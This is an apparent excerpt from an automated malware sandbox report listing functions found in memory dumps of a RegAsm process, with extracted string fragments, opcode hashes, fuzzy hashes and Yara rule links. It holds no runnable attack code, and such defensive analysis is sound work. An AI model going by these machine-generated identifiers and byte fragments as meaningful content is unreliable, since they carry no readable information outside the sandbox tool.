                                                                                                                                    • String ID: 4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q
                                                                                                                                    • API String ID: 0-3886637785
                                                                                                                                    • Opcode ID: bfc5b07815a8bdc46045591c7715e1527471ff0fee87ed12dc704619f0c7db3c
                                                                                                                                    • Instruction ID: f24d3d43cc040b7cded5415d8b5f6888dc5874c589e2dc910c2427b635f9ab08
                                                                                                                                    • Opcode Fuzzy Hash: bfc5b07815a8bdc46045591c7715e1527471ff0fee87ed12dc704619f0c7db3c
                                                                                                                                    • Instruction Fuzzy Hash: BA82DC34A4020A9FDB48EF65E995ADDBBB2FB84304F1045ADD049AB368DF305D8ACF51
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 06830D80 Relevance: 20.6, Strings: 16, Instructions: 616COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1881293459.0000000006830000.00000040.00000800.00020000.00000000.sdmp, Offset: 06830000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_6830000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                                                                                    • API String ID: 0-2449488485
                                                                                                                                    • Opcode ID: 8e11e470f5f8a248ca4ffa824d35a46bede8dfcac90a5f469dd2d5417d8d0a88
                                                                                                                                    • Instruction ID: 04c695eda8510cb0c15dc509a45015ef0243cf0758153595f82dc5bb52618f9f
                                                                                                                                    • Opcode Fuzzy Hash: 8e11e470f5f8a248ca4ffa824d35a46bede8dfcac90a5f469dd2d5417d8d0a88
                                                                                                                                    • Instruction Fuzzy Hash: DA22CF30B002199FDB55DB69C858A6EBBF7FF89704B10846AE606CB3A5CB75DC01CB91
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 07AC7610 Relevance: 19.5, Strings: 15, Instructions: 713COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1890474143.0000000007AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AC0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_7ac0000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: (_^q$(_^q$(_^q$(_^q$(_^q$(_^q$(_^q$(_^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                                                                                    • API String ID: 0-441867370
                                                                                                                                    • Opcode ID: c2e85c780cdae7263ca6aaf56b75467ec43441d884b92cb043fb337cfdf53076
                                                                                                                                    • Instruction ID: 4b939ac88ef4c16a80bf754b70e6136a17ce46ea7b4e2b70a14e9f29bf26a076
                                                                                                                                    • Opcode Fuzzy Hash: c2e85c780cdae7263ca6aaf56b75467ec43441d884b92cb043fb337cfdf53076
                                                                                                                                    • Instruction Fuzzy Hash: 0B625C74A002199FDB15EFB8D850BADBBB6FF88300F1045A9D105AB368DB35AE45CF51
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 06831582 Relevance: 7.8, Strings: 6, Instructions: 335COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1881293459.0000000006830000.00000040.00000800.00020000.00000000.sdmp, Offset: 06830000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_6830000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: $^q$$^q$$^q$$^q$$^q$$^q
                                                                                                                                    • API String ID: 0-2392861976
                                                                                                                                    • Opcode ID: c8801939347328a316d888792509b5d51a0f325acde7933f2d3bf796bb4fb4b3
                                                                                                                                    • Instruction ID: 2ba1fbf47e8f5401a8035dea1c64b04d6b2fed2d296f22665363bce7a057833b
                                                                                                                                    • Opcode Fuzzy Hash: c8801939347328a316d888792509b5d51a0f325acde7933f2d3bf796bb4fb4b3
                                                                                                                                    • Instruction Fuzzy Hash: B2C1F530B002289FDB949BA4C858A7E7BE6FF89B04F14846AD642CB3A5DF75DC05C791
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 07AC0690 Relevance: 4.0, Strings: 3, Instructions: 225COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1890474143.0000000007AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AC0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_7ac0000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: Hbq$Hbq$LR^q
                                                                                                                                    • API String ID: 0-2893092976
                                                                                                                                    • Opcode ID: e09e8d0dd85cac737e9508b4bbcf3cf3965fe01b433473204264bb9e83dfd899
                                                                                                                                    • Instruction ID: d851ef10b7175cb03b06942e967d484907d88903b3c37bd909843fa325fc95ed
                                                                                                                                    • Opcode Fuzzy Hash: e09e8d0dd85cac737e9508b4bbcf3cf3965fe01b433473204264bb9e83dfd899
                                                                                                                                    • Instruction Fuzzy Hash: 5D7133B1B04266EFDB19DB75881027F7BF2AF85201F18807EE566CB281EB34C901CB91
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 016957A0 Relevance: 3.8, Strings: 3, Instructions: 72COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1861004317.0000000001690000.00000040.00000800.00020000.00000000.sdmp, Offset: 01690000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_1690000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: `Q^q$`Q^q$`Q^q
                                                                                                                                    • API String ID: 0-846367443
                                                                                                                                    • Opcode ID: 16410b0cf80717cd3a805bc806e285312b87205438ceb2e1548ebe12475e7606
                                                                                                                                    • Instruction ID: 775257eaede68ed1c8168411a6c7a4d21735fd2ba132b9cf71ced1edf8ba125e
                                                                                                                                    • Opcode Fuzzy Hash: 16410b0cf80717cd3a805bc806e285312b87205438ceb2e1548ebe12475e7606
                                                                                                                                    • Instruction Fuzzy Hash: 5F21DA31F002659FDF1AAB74DC057BE7AA6FB44B04F15005ED206AF280CBB0594587D6
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 06853F50 Relevance: 2.9, Strings: 2, Instructions: 399COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1881366318.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_6850000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: $^q$k Xm^
                                                                                                                                    • API String ID: 0-3169001012
                                                                                                                                    • Opcode ID: 9beba44a62f8026d7fc7898ef12bd129f08a6670f51cf9de8ca19d50f12f6ef6
                                                                                                                                    • Instruction ID: 17a71625dfd923883514926bd4172acbd5ffbc366d99014b7825f83efc6fadbc
                                                                                                                                    • Opcode Fuzzy Hash: 9beba44a62f8026d7fc7898ef12bd129f08a6670f51cf9de8ca19d50f12f6ef6
                                                                                                                                    • Instruction Fuzzy Hash: 98E16F34F402198FCB54DF69C9849AEBBF6BF88700B258169D906EB365DB31DC41CBA1
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 07ACF940 Relevance: 2.7, Strings: 2, Instructions: 174COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1890474143.0000000007AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AC0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_7ac0000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: (&^q$(bq
                                                                                                                                    • API String ID: 0-1294341849
                                                                                                                                    • Opcode ID: 897f0f99c021f47c78ca7a781fa55614d9b5b4cf95503c3570beeab14d983749
                                                                                                                                    • Instruction ID: 3e988d08e3d1c84d53b1120edfcf3cd3c395e8f298019eb8505408e070755a94
                                                                                                                                    • Opcode Fuzzy Hash: 897f0f99c021f47c78ca7a781fa55614d9b5b4cf95503c3570beeab14d983749
                                                                                                                                    • Instruction Fuzzy Hash: BE515D71F0021A9FDB15EFA9C85069EBAF6AFC4640F248529D416AB380DE34AD02CB95
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 07AC4FB2 Relevance: 2.6, Strings: 2, Instructions: 133COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1890474143.0000000007AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AC0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_7ac0000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: xbq$xbq
                                                                                                                                    • API String ID: 0-4275011135
                                                                                                                                    • Opcode ID: 90b5a1858b25b6f5299eaf9adbfdf8968a88b2d1865b0e228840a8904daae60a
                                                                                                                                    • Instruction ID: 0ccf795cbb83a031df935ce71aafe8e5f446db558e525382cc4e1c15719865fa
                                                                                                                                    • Opcode Fuzzy Hash: 90b5a1858b25b6f5299eaf9adbfdf8968a88b2d1865b0e228840a8904daae60a
                                                                                                                                    • Instruction Fuzzy Hash: 4B513A71600206AFC755EB78E96955EBBE2FF812007108A2DC1478B7A5DF35A94ACBC1
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 07AC0680 Relevance: 2.6, Strings: 2, Instructions: 97COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1890474143.0000000007AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AC0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_7ac0000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: Hbq$LR^q
                                                                                                                                    • API String ID: 0-1310586311
                                                                                                                                    • Opcode ID: bce70f15d0fca4b2d8e5cdbd0182b6584de09dbda39bcc84f27765d567a54a6c
                                                                                                                                    • Instruction ID: 4bce88b344546d5095f461c944dd09cb0dc8bcfb249ae9b9453fbf33d4d5e30e
                                                                                                                                    • Opcode Fuzzy Hash: bce70f15d0fca4b2d8e5cdbd0182b6584de09dbda39bcc84f27765d567a54a6c
                                                                                                                                    • Instruction Fuzzy Hash: 3331F1F1A04226EFCB599F748D106BF7BF2BF81201F24846ED562DB290EA348901C792
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0553F448 Relevance: 2.6, Strings: 2, Instructions: 89COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1878737461.0000000005530000.00000040.00000800.00020000.00000000.sdmp, Offset: 05530000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_5530000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: 4'^q$4'^q
                                                                                                                                    • API String ID: 0-2697143702
                                                                                                                                    • Opcode ID: b1970a5e502f97b752a418700cb97e0c06c9c43af10c62b0a8fb7457837ab73a
                                                                                                                                    • Instruction ID: ae33341c40f36b7606512179ac27b6a313e2dde8a219d8b60d9c418befe688c5
                                                                                                                                    • Opcode Fuzzy Hash: b1970a5e502f97b752a418700cb97e0c06c9c43af10c62b0a8fb7457837ab73a
                                                                                                                                    • Instruction Fuzzy Hash: A7210230B483148FC719AB39941866E7BDBBFC5350B14497DD60ACBB94DE70DC0A8792
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0553F554 Relevance: 2.5, Strings: 2, Instructions: 45COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1878737461.0000000005530000.00000040.00000800.00020000.00000000.sdmp, Offset: 05530000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_5530000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: 4'^q$4'^q
                                                                                                                                    • API String ID: 0-2697143702
                                                                                                                                    • Opcode ID: a92efc27c8281e651969fa1494025a3d160c711bf27917ff92cec6928b50e41f
                                                                                                                                    • Instruction ID: 5c5054253fb717d2a38042a906bd011954662e171f7e4f0829602eafa0d5514b
                                                                                                                                    • Opcode Fuzzy Hash: a92efc27c8281e651969fa1494025a3d160c711bf27917ff92cec6928b50e41f
                                                                                                                                    • Instruction Fuzzy Hash: 21017B3144D3404FC316A739A851485BFD6FE8215034048AED18ACFA66DB64E90AC372
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 07AC8351 Relevance: 2.5, Strings: 2, Instructions: 31COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1890474143.0000000007AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AC0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_7ac0000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: $^q$$^q
                                                                                                                                    • API String ID: 0-355816377
                                                                                                                                    • Opcode ID: 6dab6741e2134fbc71fd75c7250d205f06d74f08f39af94ae96d60ab5aa94f8d
                                                                                                                                    • Instruction ID: cc212ac670201f99ccf76f5b14d6f2e9a44b1bb1fff4cacdda85bf449f6ccc1b
                                                                                                                                    • Opcode Fuzzy Hash: 6dab6741e2134fbc71fd75c7250d205f06d74f08f39af94ae96d60ab5aa94f8d
                                                                                                                                    • Instruction Fuzzy Hash: D0F097B0B003189FC338C724900434A3BF0BB89210F14182EC581CF302DBB8EC018781
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 068548A8 Relevance: 1.8, Strings: 1, Instructions: 509COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1881366318.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_6850000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: + Xm^
                                                                                                                                    • API String ID: 0-1740075132
                                                                                                                                    • Opcode ID: dcdb49f05b559e170c2826d64f3233edf3772cb7298b2d107b17ca82a91a8808
                                                                                                                                    • Instruction ID: 5477d211b1de17ae1dd6ccd70c7aba13af462ccebe29eccf2d4f3134ae87996f
                                                                                                                                    • Opcode Fuzzy Hash: dcdb49f05b559e170c2826d64f3233edf3772cb7298b2d107b17ca82a91a8808
                                                                                                                                    • Instruction Fuzzy Hash: C1122934B006058FDB55DF29C584A6EBBF2BF89304B1684A9E906DB376DB30EC85CB51
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 06830598 Relevance: 1.7, Strings: 1, Instructions: 462COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1881293459.0000000006830000.00000040.00000800.00020000.00000000.sdmp, Offset: 06830000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_6830000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: )lPj
                                                                                                                                    • API String ID: 0-2859456766
                                                                                                                                    • Opcode ID: aff671ab22b535f4ef0c4148e2a91b6e2737bcfe928841b818da32573d7e5259
                                                                                                                                    • Instruction ID: 4305dd2ff24579c10ab1221db07ffa3fef06d401b4cdc009c558709ec85189cb
                                                                                                                                    • Opcode Fuzzy Hash: aff671ab22b535f4ef0c4148e2a91b6e2737bcfe928841b818da32573d7e5259
                                                                                                                                    • Instruction Fuzzy Hash: C2029C307403289FDB549F64C864A6EBBF2FB89704F108959D6029B3A1CFB6ED058BD1
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 068559C8 Relevance: 1.5, Strings: 1, Instructions: 294COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1881366318.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_6850000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: d
                                                                                                                                    • API String ID: 0-2564639436
                                                                                                                                    • Opcode ID: abfdc20650a1a1ea2a040c6f3f934a13c6db0086b4e76c659b33fd3b2be1eb1c
                                                                                                                                    • Instruction ID: f2f638a68c97d5cc8f049498a14e8fd6325d0e99ac65d97b92be5985ff7a469b
                                                                                                                                    • Opcode Fuzzy Hash: abfdc20650a1a1ea2a040c6f3f934a13c6db0086b4e76c659b33fd3b2be1eb1c
                                                                                                                                    • Instruction Fuzzy Hash: E5C16E34600606CFCB65CF28C58096ABBF2FF89310B16CA99D95ADB665D730FC46CB91
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0553C64B Relevance: 1.5, Strings: 1, Instructions: 280COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1878737461.0000000005530000.00000040.00000800.00020000.00000000.sdmp, Offset: 05530000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_5530000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: ,bq
                                                                                                                                    • API String ID: 0-2474004448
                                                                                                                                    • Opcode ID: a7c79597b919648f25f668af281ae2b6711b42cb4205674e27aaf926f5474e94
                                                                                                                                    • Instruction ID: aa1cad657eea10aafd2ff51bc8726f396c1bda7e2c20ab650c78ebcc78a60b6a
                                                                                                                                    • Opcode Fuzzy Hash: a7c79597b919648f25f668af281ae2b6711b42cb4205674e27aaf926f5474e94
                                                                                                                                    • Instruction Fuzzy Hash: 2291A230B442098FCB15DA39855993ABBE7BFC9610B1548AAD40AEF364FF31DC41CBA1
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0553DCE0 Relevance: 1.5, Strings: 1, Instructions: 257COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1878737461.0000000005530000.00000040.00000800.00020000.00000000.sdmp, Offset: 05530000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_5530000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: ,bq
                                                                                                                                    • API String ID: 0-2474004448
                                                                                                                                    • Opcode ID: 4b1d6a76cfdd88ef5161a558c95ed3776575deb3633af11fb67dfcf1f6dd0c70
                                                                                                                                    • Instruction ID: 86135ec0f265a810e9c2fe5d89184a6d0dadd6d2c8c6f352c045e99e0f8fb6fe
                                                                                                                                    • Opcode Fuzzy Hash: 4b1d6a76cfdd88ef5161a558c95ed3776575deb3633af11fb67dfcf1f6dd0c70
                                                                                                                                    • Instruction Fuzzy Hash: 6D819330B841098FDB58AA39855AA3A3BF77FC569072448A5C40BCF3A5EF35DC46C762
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0553D8C7 Relevance: 1.4, Strings: 1, Instructions: 177COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1878737461.0000000005530000.00000040.00000800.00020000.00000000.sdmp, Offset: 05530000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_5530000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: d
                                                                                                                                    • API String ID: 0-2564639436
                                                                                                                                    • Opcode ID: 325e581475d1f57bbcea146442763dce38d30503ec0ce3dfce8361b295195a1d
                                                                                                                                    • Instruction ID: 1cb85f405509fd7036a52cf5f5ee46844a58ef7255f189fa5d3fd5d557788c84
                                                                                                                                    • Opcode Fuzzy Hash: 325e581475d1f57bbcea146442763dce38d30503ec0ce3dfce8361b295195a1d
                                                                                                                                    • Instruction Fuzzy Hash: 6B719C31A0460ADFCB11CF59C5C08AAFBB6FF88310B14C5A9D95A9B615DB31FD51CBA0
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 07ACAFF8 Relevance: 1.4, Strings: 1, Instructions: 126COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1890474143.0000000007AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AC0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_7ac0000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: CL
                                                                                                                                    • API String ID: 0-1074759137
                                                                                                                                    • Opcode ID: 56b5980e7ee38d8bc4d4cecdabf0f9e381aff2bdbaba186834972e132e052e61
                                                                                                                                    • Instruction ID: 5ddd6da184ebd16358a97444ecdcc5bf574dc9e3d408085be8108a646c8c98ff
                                                                                                                                    • Opcode Fuzzy Hash: 56b5980e7ee38d8bc4d4cecdabf0f9e381aff2bdbaba186834972e132e052e61
                                                                                                                                    • Instruction Fuzzy Hash: 335190B4E012199FCB44DFA8D994ADDBBF2FF88300F10812AE515AB354DB34A946CF61
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 07ACB008 Relevance: 1.4, Strings: 1, Instructions: 123COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1890474143.0000000007AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AC0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_7ac0000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: CL
                                                                                                                                    • API String ID: 0-1074759137
                                                                                                                                    • Opcode ID: 23ad6167a5b785537dbd0fe553cb37ce7b3f19c307060641af7e91798095693d
                                                                                                                                    • Instruction ID: fdf6056af24a048a16180fd8d92035a9efe920b281e87b4d0aef2a8b515ced88
                                                                                                                                    • Opcode Fuzzy Hash: 23ad6167a5b785537dbd0fe553cb37ce7b3f19c307060641af7e91798095693d
                                                                                                                                    • Instruction Fuzzy Hash: D85160B4E012199FCB44DFA8D894ADDBBF2FF88310F10812AE515AB354DB34A945CF61
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 06853DE0 Relevance: 1.4, Strings: 1, Instructions: 119COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1881366318.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_6850000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: 4'^q
                                                                                                                                    • API String ID: 0-1614139903
                                                                                                                                    • Opcode ID: 2b18c36a3f62860cf2f4e95fdb7972ee91b17dce95e1e2d8d643667c221a71e0
                                                                                                                                    • Instruction ID: c2439978572cbb4898edad30b6abcab7bae1b260614d48df196a841d60f982f4
                                                                                                                                    • Opcode Fuzzy Hash: 2b18c36a3f62860cf2f4e95fdb7972ee91b17dce95e1e2d8d643667c221a71e0
                                                                                                                                    • Instruction Fuzzy Hash: 273156317443554FC756A738A42046EBBEAEFC629030A48BAD549CF751EE30EC07C7A2
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 07AC24D0 Relevance: 1.4, Strings: 1, Instructions: 114COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1890474143.0000000007AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AC0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_7ac0000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: `Q^q
                                                                                                                                    • API String ID: 0-1948671464
                                                                                                                                    • Opcode ID: c56daf5fe65eb35e46d88b038587e0700cec71db673cbf915c3c3128c6adfa85
                                                                                                                                    • Instruction ID: e3d511054a19175fad6125ec9e87e276844a70b72581ff17cb832f0c1c82c04e
                                                                                                                                    • Opcode Fuzzy Hash: c56daf5fe65eb35e46d88b038587e0700cec71db673cbf915c3c3128c6adfa85
                                                                                                                                    • Instruction Fuzzy Hash: 8541E575A0024DAFCF05DFA8D8506DEBBB5FF85310F10412AE615AB298DB70AD49CB80
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 068584C8 Relevance: 1.4, Strings: 1, Instructions: 102COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1881366318.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_6850000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: 4'^q
                                                                                                                                    • API String ID: 0-1614139903
                                                                                                                                    • Opcode ID: 035c701e79b3dc5918afb611e58b1c815bf54e37c5d1f7437ba5257b9a6e7b1c
                                                                                                                                    • Instruction ID: a62825157e3f4515cb140658c261b898e6574c4c6cae31e3aaa25c0399a07799
                                                                                                                                    • Opcode Fuzzy Hash: 035c701e79b3dc5918afb611e58b1c815bf54e37c5d1f7437ba5257b9a6e7b1c
                                                                                                                                    • Instruction Fuzzy Hash: 5C31CF317002198FDB09FB78949416E77E7ABC8210710457DD60BCB389EE75CD0687D2
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 06831BA0 Relevance: 1.3, Instructions: 1339COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
